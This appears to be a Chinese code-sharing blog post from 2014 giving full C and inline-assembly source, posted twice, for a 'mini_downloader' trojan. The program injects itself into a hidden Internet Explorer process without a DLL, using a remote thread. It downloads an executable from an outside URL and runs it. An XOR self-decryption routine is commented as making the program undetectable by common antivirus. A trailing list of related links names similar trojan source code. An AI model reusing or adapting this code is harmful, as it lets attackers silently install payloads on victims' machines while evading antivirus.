无dll插入进程
2014-05-20 22:33
323 查看
/*
"mini_downloader"
code by kardinal p.s.t
compile by vc++ 6.0
can not run under win98;
*/
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
//#pragma comment(linker, "/opt:nowin98") //取消这4行的注释,可编译出2k大的文件
//#pragma comment(linker, "/merge:.data=.text")
//#pragma comment(linker, "/merge:.rdata=.text")
//#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/entry:decrpt")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/base:0x13150000")
hinstance (winapi *shellrun)(hwnd,lpctstr, lpctstr, lpctstr ,lpctstr , int );//动态加载shell32.dll中的shellexecutea函数
dword (winapi *downfile) (lpctstr ,lpctstr, lpctstr ,dword, lpctstr);//动态加载urlmon.dll中的urldownloadtofilea函数
handle (winapi *myinject) (handle, lpsecurity_attributes, dword,lpthread_start_routine, lpvoid, dword, lpdword); //建立远程线程,并运行
handle processhandle;
dword pid;
hinstance hshell,hurlmon,hkernel;
void download() //注入使用的下载函数
{
hshell=loadlibrary("shell32.dll");
hurlmon=loadlibrary("urlmon.dll");
(farproc&)shellrun=getprocaddress(hshell,"shellexecutea");
(farproc&)downfile= getprocaddress(hurlmon,"urldownloadtofilea");
downfile(null,"http://www.testtest.ac.cn/eeeeeeeeeeeeee ... eeeeen/notepad.exe","c:\\ieinst12.exe",0, null);
shellrun(0,"open","c:\\ieinst12.exe",null,null,5);
exitprocess(0);
};
void main() //主函数
{
//1.得到ie路径,并运行
char iename[max_path],iepath[max_path];
zeromemory(iename,sizeof(iename));
zeromemory(iepath,sizeof(iepath));
getwindowsdirectory(iepath,max_path);
strncpy(iename,iepath,3);
strcat(iename,"program files\\internet explorer\\iexplore.exe");
winexec(iename,sw_hide);
sleep(500);
//2.得到 ie process handle
hwnd htemp;
htemp=findwindow("ieframe",null);
getwindowthreadprocessid(htemp,&pid);
processhandle=openprocess(process_all_access, false, pid);
//3.分配内存
hmodule module;
lpvoid newmodule;
dword size;
lpdword lpimagesize;
module = getmodulehandle(null);//进程映像的基址
//得到内存镜像大小
_asm
{
push eax;
push ebx;
mov ebx,module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
size=(dword)lpimagesize;
newmodule = virtualallocex(processhandle, module, size, mem_commit | mem_reserve, page_execute_readwrite); //确定起始基址和内存映像基址的位置
//4.写内存,创建线程
writeprocessmemory(processhandle, newmodule, module, size, null);//写数据
lpthread_start_routine entrypoint;
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
hkernel=loadlibrary("kernel32.dll");
(farproc&)myinject= getprocaddress(hkernel,"createremotethread");
myinject(processhandle, null, 0, entrypoint, module, 0, null); //建立远程线程,并运行
//5.关闭对象
closehandle(processhandle);
return;
} ;
//解密函数
void decrpt()
{
handle myps;
dword oldattr;
byte shellcode[500];
zeromemory(shellcode,sizeof(shellcode));
myps=getcurrentprocess();
::virtualprotectex(myps,&download,0x1000,page_execute_readwrite,&oldattr);
//先把原代码,搬移到变量中保存起来
_asm
{
pushad;
lea esi,download
lea edi,shellcode;
lea ecx,decrpt;
sub ecx,esi;
en1:
lodsb;
stosb;
dec ecx;
jne en1;
popad;
};
//解密搬回
int i;
for (i=1;i<=0xff;i++)
{
_asm
{
pushad;
lea esi,shellcode;
lea edi,download;
lea ecx,decrpt;
sub ecx,edi;
en2:
lodsb;
mov ebx,i;
xor al,bl;
stosb;
dec ecx;
jne en2;
popad;
};
//此结构的的作用在于使一般的杀毒软件无法探测出来是病毒.
__try
{
main();
return;
}
__except(exception_execute_handler)
{
};
}
return;
};
/*
"mini_downloader"
code by kardinal p.s.t
compile by vc++ 6.0
can not run under win98;
*/
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
//#pragma comment(linker, "/opt:nowin98") //取消这4行的注释,可编译出2k大的文件
//#pragma comment(linker, "/merge:.data=.text")
//#pragma comment(linker, "/merge:.rdata=.text")
//#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/entry:decrpt")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/base:0x13150000")
hinstance (winapi *shellrun)(hwnd,lpctstr, lpctstr, lpctstr ,lpctstr , int );//动态加载shell32.dll中的shellexecutea函数
dword (winapi *downfile) (lpctstr ,lpctstr, lpctstr ,dword, lpctstr);//动态加载urlmon.dll中的urldownloadtofilea函数
handle (winapi *myinject) (handle, lpsecurity_attributes, dword,lpthread_start_routine, lpvoid, dword, lpdword); //建立远程线程,并运行
handle processhandle;
dword pid;
hinstance hshell,hurlmon,hkernel;
void download() //注入使用的下载函数
{
hshell=loadlibrary("shell32.dll");
hurlmon=loadlibrary("urlmon.dll");
(farproc&)shellrun=getprocaddress(hshell,"shellexecutea");
(farproc&)downfile= getprocaddress(hurlmon,"urldownloadtofilea");
downfile(null,"http://www.testtest.ac.cn/eeeeeeeeeeeeee ... eeeeen/notepad.exe","c:\\ieinst12.exe",0, null);
shellrun(0,"open","c:\\ieinst12.exe",null,null,5);
exitprocess(0);
};
void main() //主函数
{
//1.得到ie路径,并运行
char iename[max_path],iepath[max_path];
zeromemory(iename,sizeof(iename));
zeromemory(iepath,sizeof(iepath));
getwindowsdirectory(iepath,max_path);
strncpy(iename,iepath,3);
strcat(iename,"program files\\internet explorer\\iexplore.exe");
winexec(iename,sw_hide);
sleep(500);
//2.得到 ie process handle
hwnd htemp;
htemp=findwindow("ieframe",null);
getwindowthreadprocessid(htemp,&pid);
processhandle=openprocess(process_all_access, false, pid);
//3.分配内存
hmodule module;
lpvoid newmodule;
dword size;
lpdword lpimagesize;
module = getmodulehandle(null);//进程映像的基址
//得到内存镜像大小
_asm
{
push eax;
push ebx;
mov ebx,module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
size=(dword)lpimagesize;
newmodule = virtualallocex(processhandle, module, size, mem_commit | mem_reserve, page_execute_readwrite); //确定起始基址和内存映像基址的位置
//4.写内存,创建线程
writeprocessmemory(processhandle, newmodule, module, size, null);//写数据
lpthread_start_routine entrypoint;
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
hkernel=loadlibrary("kernel32.dll");
(farproc&)myinject= getprocaddress(hkernel,"createremotethread");
myinject(processhandle, null, 0, entrypoint, module, 0, null); //建立远程线程,并运行
//5.关闭对象
closehandle(processhandle);
return;
} ;
//解密函数
void decrpt()
{
handle myps;
dword oldattr;
byte shellcode[500];
zeromemory(shellcode,sizeof(shellcode));
myps=getcurrentprocess();
::virtualprotectex(myps,&download,0x1000,page_execute_readwrite,&oldattr);
//先把原代码,搬移到变量中保存起来
_asm
{
pushad;
lea esi,download
lea edi,shellcode;
lea ecx,decrpt;
sub ecx,esi;
en1:
lodsb;
stosb;
dec ecx;
jne en1;
popad;
};
//解密搬回
int i;
for (i=1;i<=0xff;i++)
{
_asm
{
pushad;
lea esi,shellcode;
lea edi,download;
lea ecx,decrpt;
sub ecx,edi;
en2:
lodsb;
mov ebx,i;
xor al,bl;
stosb;
dec ecx;
jne en2;
popad;
};
//此结构的的作用在于使一般的杀毒软件无法探测出来是病毒.
__try
{
main();
return;
}
__except(exception_execute_handler)
{
};
}
return;
};
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 一个向别的进程插入dll的代码
- 一个向别的进程插入dll的代码收藏
- dll插入系统进程的源码
- 对网上“dll插入系统进程的源码!算是写木马的经典了”文章所附源代码的修改
- 无Dll插入进程,下载者VC源代码
- 一个向别的进程插入dll的代码 .
- 将d盘根目录下的troydll.dll插入到ID为4000的进程中
- dll插入系统进程的源码!算是写木马的经典了
- 一个向别的进程插入dll的代码
- 无dll插入进程,下载者vc源代码
- 一个向别的进程插入dll的代码
- 无Dll插入进程,下载者VC源代码
- 一个向别的进程插入dll的代码
- 无Dll插入进程,下载者VC源代码
- 无Dll插入进程,下载者VC源代码
- 驱动 进程回调中修改导入表插入DLL (只做了一点儿修正不算原创)
- 无Dll插入进程、下载者VC源代码
- 同一个dll被多个进程使用的数据共享(Data_seg)
- w3wp进程发生死锁ISAPI '..\aspnet_isapi.dll' 报告它自身有问题,原因'Deadlock detected'
- 进程内组件程序Dll必须引出的函数